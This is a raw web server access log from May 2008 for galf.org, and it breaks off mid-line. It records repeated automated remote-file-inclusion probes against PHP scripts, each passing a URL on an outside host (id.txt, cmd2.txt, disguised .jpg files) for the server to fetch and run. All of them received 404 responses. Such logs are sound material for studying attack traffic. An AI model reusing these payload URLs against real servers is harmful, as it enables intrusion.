69.61.37.254 - - [04/May/2008:18:40:50 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.61.37.254 - - [04/May/2008:18:40:51 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.59.151.227 - - [04/May/2008:18:40:57 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.151.227 - - [04/May/2008:18:40:57 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.149.32.24 - - [04/May/2008:18:41:10 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.149.32.24 - - [04/May/2008:18:41:10 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.149.32.24 - - [04/May/2008:18:41:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.179.98 - - [04/May/2008:18:41:31 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.36.179.98 - - [04/May/2008:18:41:34 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
91.121.101.163 - - [04/May/2008:18:41:41 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.219.133.78 - - [04/May/2008:18:41:53 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.219.133.78 - - [04/May/2008:18:41:53 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.219.133.78 - - [04/May/2008:18:41:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.68.172 - - [04/May/2008:18:42:10 -0700] "GET /logs/access_071105.log//modules/agendax/addevent.inc.php?agendax_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.149.32.24 - - [04/May/2008:18:42:33 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.19.150.85 - - [04/May/2008:18:42:33 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.19.150.85 - - [04/May/2008:18:42:34 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.19.150.85 - - [04/May/2008:18:42:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.94.128.57 - - [04/May/2008:18:43:05 -0700] "GET /index1.php?page=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.219.133.78 - - [04/May/2008:18:43:05 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.137.192.95 - - [04/May/2008:18:43:28 -0700] "GET /convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "galf.org"
83.137.192.95 - - [04/May/2008:18:43:28 -0700] "GET /convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "galf.org"
72.30.216.97 - - [04/May/2008:18:43:50 -0700] "GET /logs/access.log HTTP/1.0" 200 129545 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
83.137.192.95 - - [04/May/2008:18:43:51 -0700] "GET /convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
83.137.192.95 - - [04/May/2008:18:43:51 -0700] "GET /convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
200.80.42.159 - - [04/May/2008:18:43:52 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.80.42.159 - - [04/May/2008:18:43:52 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.80.42.159 - - [04/May/2008:18:43:53 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HT